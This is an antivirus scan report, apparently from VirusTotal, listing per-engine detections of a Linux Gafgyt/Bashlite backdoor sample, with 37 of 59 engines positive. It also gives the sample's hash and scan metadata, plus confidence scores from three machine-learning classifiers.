GData result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: A:25.13734B:25.10170 detected: True
Panda update: 20170807
version: 4.6.4.2 detected: False
VBA32 update: 20170803
version: 3.12.26.4 detected: False
VIPRE update: 20170807
version: 60118 detected: False
Zoner update: 20170807
version: 1.0 detected: False
AVware update: 20170807 version: 1.5.0.42 detected: False
ClamAV result: Unix.Trojan.Gafgyt-111
update: 20170807 version: 0.99.2.0 detected: True
Comodo result: UnclassifiedMalware
update: 20170807 version: 27567 detected: True
F-Prot update: 20170807
version: 4.7.1.166 detected: False
Ikarus result: Trojan.Linux.Gafgyt
update: 20170807 version: 0.1.5.2 detected: True
McAfee result: RDN/Generic BackDoor
update: 20170807 version: 6.0.6.653 detected: True
Rising result: Backdoor.Gafgyt/Linux!1.A512 (classic) update: 20170807
version: 25.0.0.1 detected: True
Sophos result: Linux/DDoS-BI
update: 20170807 version: 4.98.0 detected: True
Yandex update: 20170801
version: 5.5.1.3 detected: False
Zillya update: 20170806
version: 2.0.0.3355 detected: False
Arcabit result: Trojan.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 1.0.0.817 detected: True
Tencent result: Linux.Backdoor.Gafgyt.Hpb
update: 20170807 version: 1.0.0.1 detected: True
ViRobot update: 20170807
version: 2014.3.20.0 detected: False
Webroot update: 20170807
version: 1.0.0.207 detected: False
Ad-Aware result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 3.0.3.1010 detected: True
AegisLab result: Backdoor.Linux.Gafgyt!c
update: 20170807 version: 4.2 detected: True
Emsisoft result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B) update: 20170807
version: 4.0.1.883 detected: True
F-Secure result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 11.0.19100.45 detected: True
Fortinet result: Linux/Gafgyt.B!tr
update: 20170807 version: 5.4.247.0 detected: True
Jiangmin result: Backdoor.Linux.gbi
update: 20170807 version: 16.0.100 detected: True
Kingsoft update: 20170807 version: 2013.8.14.323 detected: False
Symantec result: Linux.Lightaidra
update: 20170807 version: 1.4.0.0 detected: True
nProtect update: 20170807
version: 2017-08-07.02 detected: False
AhnLab-V3 result: Linux/Gafgyt.Gen
update: 20170807 version: 3.9.2.18278 detected: True
Antiy-AVL result: Trojan[Backdoor]/Linux.Gafgyt.f update: 20170807
version: 3.0.0.1 detected: True
Kaspersky result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807
version: 15.0.1.13 detected: True
Microsoft result: DDoS:Linux/Lightaidra update: 20170807
version: 1.1.14003.0 detected: True
Qihoo-360 result: Win32/Backdoor.263
update: 20170807 version: 1.0.0.1120 detected: True
TheHacker update: 20170806
version: 6.8.0.5.1813 detected: False
ZoneAlarm result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807
version: 1.0 detected: True
ESET-NOD32 result: a variant of Linux/Gafgyt.C update: 20170807
version: 15873 detected: True
TrendMicro result: ELF_BASHLITE.SMC
update: 20170807 version: 9.862.0.1074 detected: True
WhiteArmor update: 20170731
detected: False
BitDefender result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 7.2 detected: True
K7AntiVirus update: 20170807
version: 10.20.24214 detected: False
Malwarebytes update: 20170807
version: 2.1.1.1115 detected: False
TotalDefense update: 20170807
version: 37.1.62.1 detected: False
CAT-QuickHeal result: Exploit.Linux.Shellshock.A update: 20170807
version: 14.00 detected: True
NANO-Antivirus result: Trojan.Unix.Gafgyt.eikqfj update: 20170807
version: 1.0.94.18103 detected: True
MicroWorld-eScan result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807
version: 12.0.250.0 detected: True
SUPERAntiSpyware update: 20170807 version: 5.6.0.1032 detected: False
McAfee-GW-Edition result: RDN/Generic BackDoor update: 20170807
version: v2015 detected: True
TrendMicro-HouseCall result: ELF_BASHLITE.SMC update: 20170807
version: 9.950.0.1006 detected: True
total 59
sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f
scan_id 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f-1502107407
resource 08c3bf87ff0a26ac3e65f10ff1516655
permalink https://www.virustotal.com/file/0a87649048685b881f1ec96cc1ed9f2d9e66 29e62bb0337b39633da9e3284c8f/analysis/1502107407/
positives 37
scan_date 2017-08-07 12:03:27
verbose_msg Scan finished, information embedded
response_code 1
Binary
RF confidence: 100.00%
suspicious: True
MLP confidence: 99.98%
suspicious: True
SVM confidence: 98.80%
suspicious: True